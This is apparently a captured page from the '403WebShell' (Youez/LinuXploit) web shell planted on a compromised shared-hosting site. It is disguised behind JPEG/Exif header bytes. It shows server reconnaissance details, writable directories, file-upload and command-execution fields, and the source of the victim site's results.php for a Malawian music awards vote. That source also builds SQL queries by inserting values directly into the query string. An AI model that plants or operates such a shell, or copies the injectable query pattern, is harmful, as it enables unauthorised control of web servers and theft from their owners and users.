����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.133.155.48
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/malawisounds.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/malawisounds.com/results.php
<?php
	include 'connect.php';
	{
		function getResults($artist,$category)
		{
			GLOBAL $conn;
			$query="SELECT * FROM `vote` WHERE `$category`='$artist'";
			if($query_run=mysqli_query($conn,$query))
			{
				$rows=mysqli_num_rows($query_run);
				return $rows;
			}
			else
			{
				die(mysqli_error($conn));
			}
		}
	}
?>
<!doctype html>
<html>
<head>
	<title>Mwsounds|Results</title>
	<link rel="icon" type="x-icon" href="Icons/malawisounds.ico">
	<link rel="stylesheet" type="text/css" href="load.css" />
	<link rel="stylesheet" type="text/css" href="animate.css" />
	<link rel="stylesheet" type="text/css" href="w3.css" />
	<link rel="stylesheet" type="text/css" href="font1/flaticon.css" />
	<link rel="stylesheet" type="text/css" href="bootstrap/css/bootstrap.css" />
	<link rel="stylesheet" type="text/css" href="impact/stylesheet.css" />
	<meta name="viewport" content="width=device-width,initial-scale:1.0" />
	<meta charset="UTF-8" />

	  <!--og codes-->
	  <meta property="og:url"           content="http://www.malawisounds.com/results.php" />
	  <meta property="og:type"          content="website" />
	  <meta property="og:title"         content="<?php echo "Malawisounds Online Music Awards 2019";?>" />
	  <meta property="og:image"         content="http://www.malawisounds.com/Icons/Award logo.png" />
	  <meta property="og:description"   content="Results" />
	<style type="text/css">
		*
		{
			font-family:arial;
		}
		table
		{
			width:95%;
			margin:10px auto;
		}
		td,th
		{
			padding:10px;
			text-align:justify;
			border:2px solid white;
		}
		td
		{
			vertical-align:bottom;
		}
		th
		{
			text-align:center;
		}
		.award
		{
			width:150px;
			margin-left:auto;
			margin-right:auto;
			padding:0px;
		}
	
		input[type="submit"]
		{
			border:none;
			color:white;
			background-color:#ff9900;
			background-image: linear-gradient(90deg,#ffd321,#ff9933);
			padding:6px 20px;
			border-radius:15px;
			margin:2px auto;
		}
		@media screen and (max-width:400px)
		{
			.award
			{
				width:100px;
			}
		}
	</style>
</head>
<body class="w3-light-grey">
	<div id="fb-root"></div>
	<script>
		(function(d, s, id) {
		  var js, fjs = d.getElementsByTagName(s)[0];
		  if (d.getElementById(id)) return;
		  js = d.createElement(s); js.id = id;
		  js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v3.1&appId=197362031139140&autoLogAppEvents=1';
		  fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));
	</script>
	<!--Main Interphase-->
	<div class="margin w3-white w3-card-1">
		<header>
			<div class="w3-content w3-section w3-container">
				<div class="mySlides w3-animate-left">
					<img src="Icons/Malawisounds Awards.png" class="msounds" alt="Logo" />
				</div>
				<div class="mySlides w3-animate-left w3-center">
					<img src="Icons/Award logo.png" class="award" alt="Logo" />
				</div>
			</div>
		</header>
		<script>
			var myIndex = 0;
			mine();
			function mine() 
			{
			    var i;
			    var x = document.getElementsByClassName("mySlides");
			    for (i = 0; i < x.length; i++) 
			    {
			       x[i].style.display = "none";  
			    }
			    myIndex++;
			    if (myIndex > x.length) {myIndex = 1}    
			    x[myIndex-1].style.display = "block";  
			    setTimeout(mine, 8000);    
			}
		</script>
		<br>
		<div class="nav">
			<ul>
				<li><a href="home" target="_parent">HOME</a></li>|
				<li><a href="singles" target="_parent">SINGLES</a></li>|
				<li><a href="biography" target="_parent">ARTISTS</a></li>|
				<li><a href="albums" target="_parent">ALBUMS</a></li>|
				<li><a href="e-news">E<span class="w3-text-white">_</span>NEWS</a></li>
			</ul>
		</div>
		<br>
		<!-- Votes For Best Male Artist-->
		<table>
			<tr>
				<th>Best Male Artist(Overall)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Inno Busy</td>
				<td><?php echo getResults("Inno Busy","bma")?></td>
			</tr>
			<tr>
				<td>Gwamba</td>
				<td><?php echo getResults("Gwamba","bma")?></td>
			</tr>
			<tr>
				<td>Dwen Khalifa</td>
				<td><?php echo getResults("Dwen Khalifa","bma")?></td>
			</tr>
			<tr>
				<td>Louid</td>
				<td><?php echo getResults("Louid","bma")?></td>
			</tr>
		</table>
		<!-- Votes for best female artist-->
		<table>
			<tr>
				<th>Best Female Artist(Overall)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Sangie</td>
				<td><?php echo getResults("Sangie","bfa")?></td>
			</tr>
			<tr>
				<td>Miracle Chinga</td>
				<td><?php echo getResults("Miracle Chinga","bfa")?></td>
			</tr>
			<tr>
				<td>Favoured Martha</td>
				<td><?php echo getResults("Favoured Martha","bfa")?></td>
			</tr>
			<tr>
				<td>Grenna Phiri</td>
				<td><?php echo getResults("Grenna Phiri","bfa")?></td>
			</tr>
		</table>
		<!-- Votes for best upcomng male artist gospel-->
		<table>
			<tr>
				<th>Best Upcoming Male Artist(Gospel)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Fatsani</td>
				<td><?php echo getResults("Fatsani","buma_gospel")?></td>
			</tr>
			<tr>
				<td>Gospa</td>
				<td><?php echo getResults("Gospa","buma_gospel")?></td>
			</tr>
			<tr>
				<td>Paul Strong</td>
				<td><?php echo getResults("Paul Strong","buma_gospel")?></td>
			</tr>
			<tr>
				<td>Elka</td>
				<td><?php echo getResults("Elka","buma_gospel")?></td>
			</tr>
		</table>
		<!-- Votes for best upcoming female artist gospel-->
		<table>
			<tr>
				<th>Best Upcoming Female Artist(Gospel)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Gloria Praise</td>
				<td><?php echo getResults("Gloria Praise","bufa_gospel")?></td>
			</tr>
			<tr>
				<td>Nanja</td>
				<td><?php echo getResults("Nanja","bufa_gospel")?></td>
			</tr>
			<tr>
				<td>Wangisa</td>
				<td><?php echo getResults("Wangisa","bufa_gospel")?></td>
			</tr>
		</table>
		<!-- Votes for best upcoming male artist secualar-->
		<table>
			<tr>
				<th>Best Upcoming Male Artist(Secular)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Bliggie</td>
				<td><?php echo getResults("Bliggie","buma_secular")?></td>
			</tr>
			<tr>
				<td>Roca Case</td>
				<td><?php echo getResults("Roca Case","buma_secular")?></td>
			</tr>
			<tr>
				<td>Kho Gomzy</td>
				<td><?php echo getResults("Kho Gomzy","buma_secular")?></td>
			</tr>
			<tr>
				<td>Gypsy</td>
				<td><?php echo getResults("Gypsy","buma_secular")?></td>
			</tr>
		</table>
		<!--Best upcong female artist secular-->
		<table>
			<tr>
				<th>Best Upcoming Female Artist(Secular)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Queen Mishu</td>
				<td><?php echo getResults("Queen Mishu","bufa_secular")?></td>
			</tr>
			<tr>
				<td>Tuno</td>
				<td><?php echo getResults("Tuno","bufa_secular")?></td>
			</tr>
			<tr>
				<td>Lady Pace</td>
				<td><?php echo getResults("Lady Pace","bufa_secular")?></td>
			</tr>
		</table>
		<!-- votes for best band group gospel-->
		<table>
			<tr>
				<th>Best Band/Group(Gospel)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Marimba Band</td>
				<td><?php echo getResults("Marimba Band","bbg_gospel")?></td>
			</tr>
			<tr>
				<td>Kamuzu Baracks</td>
				<td><?php echo getResults("Kamuzu Baracks","bbg_gospel")?></td>
			</tr>
			<tr>
				<td>Great Angels Choir</td>
				<td><?php echo getResults("Great Angels Choir","bbg_gospel")?></td>
			</tr>
			<tr>
				<td>Cornerstone Music</td>
				<td><?php echo getResults("Cornerstone Music","bbg_gospel")?></td>
			</tr>
		</table>
		<!-- votes for best band group secular-->
		<table>
			<tr>
				<th>Best Band/Group(Secular)</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Black Missionaries</td>
				<td><?php echo getResults("Black Missionaries","bbg_secular")?></td>
			</tr>
			<tr>
				<td>Zathu Band</td>
				<td><?php echo getResults("Zathu Band","bbg_secular")?></td>
			</tr>
			<tr>
				<td>Mabilinganya Empire</td>
				<td><?php echo getResults("Mabilinganya Empire","bbg_secular")?></td>
			</tr>
		</table>
		<!-- votes for best producer-->
		<table>
			<tr>
				<th>Best Producer</th>
				<th>Votes</th>
			</tr>
			<tr>
				<td>Manifest</td>
				<td><?php echo getResults("Manifest","bp")?></td>
			</tr>
			<tr>
				<td>Jay Emm</td>
				<td><?php echo getResults("Jay Emm","bp")?></td>
			</tr>
			<tr>
				<td>King D</td>
				<td><?php echo getResults("King D","bp")?></td>
			</tr>
			<tr>
				<td>EQ</td>
				<td><?php echo getResults("EQ","bp")?></td>
			</tr>
		</table>
		<!--Facebook like button-->
		<div style="overflow-x:auto;">
		 	<div class="fb-like" data-href="https://facebook.com/Malawi-Sounds-303591487173877/?_e_pi_=7%2CPAGE_ID10%2C3127301386" data-layout="standard" data-action="like" data-size="small" data-show-faces="true" data-share="true"></div>
		</div>
		<!--Footer-->
		<div class="footer" style="padding:3px 10px 3x 10px;">
			<div class="w3-center social">
				<a href="https://www.facebook.com/Malawi-Sounds-303591487173877/"><img src="Icons/facebook.png" alt="fb" class="link"></a>
				<a href="http://www.twitter.com/2muzik3"><img src="Icons/Twitter.png" alt="twitter" class="link"></a>	
				<a href="https://www.instagram.com/p/BtHqqNCFytO/?utm_source=ig_share_sheet&igshid=1b4zv5kw0jg6"><img src="Icons/instagram.png" alt="instagram" class="link"></a>	
				<a href="https://chat.whatsapp.com/9EBW2hoH3d9Cq11LZegfxf"><img src="Icons/whatsapp.png" alt="whatsapp" class="link"></a>	
			</div>
			<div class="details w3-center">
				<a href="terms.php" target="_parent">Terms and conditions</a> | 
				<a href="contact.php" target="_parent">Contact us</a> | 
				<a href="about.php" target="_parent">About Us</a>
			</div>
			<h4 class="w3-text-white w3-center text-justify">Copyright &copy;2018- <?php echo date('Y',time());?></h4> 
		</div>
	</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit